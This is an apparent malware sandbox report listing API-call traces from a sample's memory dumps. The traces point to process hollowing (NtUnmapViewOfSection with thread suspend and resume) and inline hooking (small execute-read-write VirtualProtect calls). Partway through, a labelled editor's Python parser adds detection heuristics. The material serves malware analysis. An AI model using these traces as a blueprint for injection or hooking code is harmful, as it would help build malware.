  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
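Added example, not part of the Joe Sandbox report and not sandbox code: a small Python parser for the "APIs" listing format used throughout this report, run over two listings quoted (abridged) from the report itself, the function at ref 001DC240 (ResumeThread / WaitForSingleObject / SuspendThread with NtUnmapViewOfSection in a subcall) and the function at ref 001D79D6 (GetModuleHandleA followed by four VirtualProtect calls on 4- and 5-byte regions with new protection 00000040). VirtualProtect's argument order is (lpAddress, dwSize, flNewProtect, lpflOldProtect) and 0x40 is PAGE_EXECUTE_READWRITE; everything else in the two heuristics `inline_hook_candidates` and `unmap_and_thread_control`, including the size thresholds, is the editor's own triage assumption. The functions flag call shapes worth a manual look; they do not confirm behaviour.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Line shapes taken from the report's "APIs" listings; the bullet is optional so
# copy-pasted plain text parses too.
_API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory-protection constant


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None for '?' or non-numeric tokens
    ref: int
    subcall_of: Optional[int]   # caller address for "Part of subcall function" lines


def _parse_arg(tok: str) -> Optional[int]:
    # The report prints stack slots as zero-padded hex, sometimes with a leading '-'.
    # Non-hex tokens ('?', 'EMPTY', '.dll', ...) become None.
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]{1,8})", tok.strip())
    if not m:
        return None
    return -int(m.group(2), 16) if m.group(1) else int(m.group(2), 16)


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue  # skips "APIs", "Strings", "Memory Dump Source" headers
        raw = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=[_parse_arg(a) for a in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("caller"), 16) if m.group("caller") else None,
        ))
    return calls


def inline_hook_candidates(calls: List[ApiCall]) -> List[ApiCall]:
    # Assumption: VirtualProtect(addr, 4..6 bytes, PAGE_EXECUTE_READWRITE) is the
    # shape of patching a function prologue with a 5-byte JMP, not of a loader
    # relocating a whole section.
    out = []
    for c in calls:
        if c.api == "VirtualProtect" and len(c.args) >= 3:
            size, protect = c.args[1], c.args[2]
            if size is not None and 4 <= size <= 6 and protect == PAGE_EXECUTE_READWRITE:
                out.append(c)
    return out


def unmap_and_thread_control(calls: List[ApiCall]) -> bool:
    # Assumption: suspend/resume of a thread in the same function (subcalls
    # included) as NtUnmapViewOfSection deserves a manual look; it is not proof.
    names = {c.api for c in calls}
    return "NtUnmapViewOfSection" in names and bool(names & {"SuspendThread", "ResumeThread"})


def triage(text: str) -> dict:
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "inline_hook_refs": [f"{c.ref:08X}" for c in inline_hook_candidates(calls)],
        "unmap_thread_control": unmap_and_thread_control(calls),
    }


# Abridged excerpts quoted from this report's "APIs" listings.
UNMAP_BLOCK = """\
  • memset.NTDLL ref: 001DC240
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
"""
HOOK_BLOCK = """\
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
"""

if __name__ == "__main__":
    for name, block in (("UNMAP_BLOCK", UNMAP_BLOCK), ("HOOK_BLOCK", HOOK_BLOCK)):
        print(name, triage(block))
```

The fourth VirtualProtect in the hook listing (size 00000004, new protection 00000000) is deliberately not flagged: the report shows the original protection being passed back as a variable, so a restore call looks like that and a rule keyed on 0x40 alone leaves it out. Argument slots printed as `?` by the sandbox are unknown, which is why the parser keeps them as None rather than guessing.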
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
